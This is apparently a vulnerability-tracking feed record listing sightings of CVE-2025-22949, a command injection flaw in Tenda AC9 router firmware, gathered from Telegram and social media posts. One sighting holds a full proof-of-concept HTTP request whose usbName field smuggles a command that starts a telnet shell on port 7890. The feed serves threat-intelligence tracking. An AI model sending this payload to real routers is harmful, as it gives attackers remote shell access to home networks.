{"vulnerability": "cve-2025-22949", "sightings": [{"uuid": "39bb9ee6-ebaf-43cd-80f3-ffc21c3949df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://t.me/cvedetector/14961", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-22949 - Tenda Router Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-22949 \nPublished : Jan. 10, 2025, 4:15 p.m. | 38\u00a0minutes ago \nDescription : Tenda ac9 v1.0 firmware v15.03.05.19 is vulnerable to command injection in /goform/SetSambaCfg, which may lead to remote arbitrary code execution. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-10T18:00:41.000000Z"}, {"uuid": "12be70eb-81b6-4790-af5d-a3f203785697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "exploited", "source": "https://t.me/haj3imad/908", "content": "Tenda_AC9V1.0_V15.03.05.19_formSetSambaConf_doSystemCmd_CI\n\nCVE-2025-22949\n\nPOST /goform/SetSambaCfg HTTP/1.1\nHost: 192.168.0.1\nContent-Length: 47\nX-Requested-With: XMLHttpRequest\nAccept-Language: zh-CN,zh;q=0.9\nAccept: */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36\nOrigin: http://192.168.0.1\nReferer: http://192.168.0.1/wifi_wps.html?random=0.5358142303799198&\nAccept-Encoding: gzip, deflate, br\nCookie: password=5f4dcc3b5aa765d61d8327deb882cf99isqtgb\nConnection: keep-alive\n\naction=del&usbName=1;telnetd -l /bin/sh -p 7890\n\n#exploit #poc", "creation_timestamp": "2025-02-19T05:21:03.000000Z"}, {"uuid": "27ee055c-ded3-4a40-a0ca-e07232e06159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfflpbrjer2k", "content": "", "creation_timestamp": "2025-01-10T16:16:24.365704Z"}, {"uuid": "403b0f1a-21ca-4397-af68-d25091ab7ace", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-22949", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lfvwe63hus2q", "content": "", "creation_timestamp": "2025-01-17T04:09:38.493674Z"}, {"uuid": "ba442cc7-8fb1-41c3-bcfe-25401c3a52cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1499", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22949\n\ud83d\udd39 Description: Tenda ac9 v1.0 firmware v15.03.05.19 is vulnerable to command injection in /goform/SetSambaCfg, which may lead to remote arbitrary code execution.\n\ud83d\udccf Published: 2025-01-10T00:00:00\n\ud83d\udccf Modified: 2025-01-14T14:51:26.573Z\n\ud83d\udd17 References:\n1. https://noisy-caravel-a9a.notion.site/Tenda_AC9V1-0_V15-03-05-19_formSetSambaConf_doSystemCmd_CI-16f898c94eac80d5801bdaf777ac2b27", "creation_timestamp": "2025-01-14T15:12:02.000000Z"}, {"uuid": "2e436e27-fe2a-451e-9023-daec0a1658e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804747178321116", "content": "", "creation_timestamp": "2025-01-10T15:23:52.032802Z"}]}